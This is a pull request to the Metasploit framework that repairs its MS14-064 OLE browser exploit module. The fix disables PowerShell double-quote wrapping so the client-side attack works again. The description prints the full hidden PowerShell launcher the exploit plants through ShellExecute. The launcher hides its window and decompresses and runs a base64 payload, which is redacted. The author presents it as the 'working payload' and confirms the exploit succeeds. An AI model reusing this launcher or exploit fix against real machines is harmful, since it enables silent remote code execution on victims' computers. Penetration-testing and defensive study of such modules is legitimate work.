### PR TITLE
Regression fix: Disabling wrap_double_quotes

### DIFF
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'HTTP::compression' => 'gzip'
+          'HTTP::compression' => 'gzip',
           'Powershell::wrap_double_quotes' => false
         },
       'Payload'        =>

--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -71,6 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'HTTP::compression' => 'gzip'
+          'Powershell::wrap_double_quotes' => false
         },
       'Payload'        =>
         {
@@ -85,11 +86,6 @@ class MetasploitModule < Msf::Exploit::Remote
            OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]),
            OptBool.new('AllowPowershellPrompt', [true, 'Allow exploit to try Powershell', false])
         ])
-      register_advanced_options(
-        [
-           OptBool.new('Powershell::wrap_double_quotes', [true, 'Wraps the -Command argument in single quotes', false])
-        ])
-
   end
 
   def vbs_prepare()

--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -85,6 +85,10 @@ class MetasploitModule < Msf::Exploit::Remote
            OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]),
            OptBool.new('AllowPowershellPrompt', [true, 'Allow exploit to try Powershell', false])
         ])
+      register_advanced_options(
+        [
+           OptBool.new('Powershell::wrap_double_quotes', [true, 'Wraps the -Command argument in single quotes', false])
+        ])
 
   end
 


### PR DESCRIPTION
This client side exploit stopped working in current MSF throws an error in client browser.As per the analysis its because of Powershell::wrap_double_quotes=true. 
I have just Added "Powershell::wrap_double_quotes"  as advance option to override Datastore value.


Error when Powershell::wrap_double_quotes value set to true.
`shell.ShellExecute "powershell.exe", "-nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''**<REDEACTED>**''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"", "", "open", 0
end function`

![1_MSF_Output_error](https://user-images.githubusercontent.com/26090453/57834831-c8fb5080-77da-11e9-8131-8b0fb0eb2a8a.png)
![2error](https://user-images.githubusercontent.com/26090453/57834832-c8fb5080-77da-11e9-9dd2-f4aa4148cb7e.png)
![3 ViewSourece_error](https://user-images.githubusercontent.com/26090453/57834833-c993e700-77da-11e9-97d3-e096334b4831.png)
![error](https://user-images.githubusercontent.com/26090453/57834854-d6183f80-77da-11e9-88e8-90c006f90391.png)

> **Working POC**

If the "Powershell::wrap_double_quotes"  value is set to **_false_** this exploit works.
Working Payload 
`shell.ShellExecute "powershell.exe", "-nop -w hidden -noni -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''**<RECEACTED>**''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);", "", "open", 0
end function`

![Working](https://user-images.githubusercontent.com/26090453/57835053-63f42a80-77db-11e9-9bfb-aeb82ad16544.png)
![Working_exploit](https://user-images.githubusercontent.com/26090453/57835055-648cc100-77db-11e9-9a4d-8677a400802d.png)

I have tested this multiple times and it works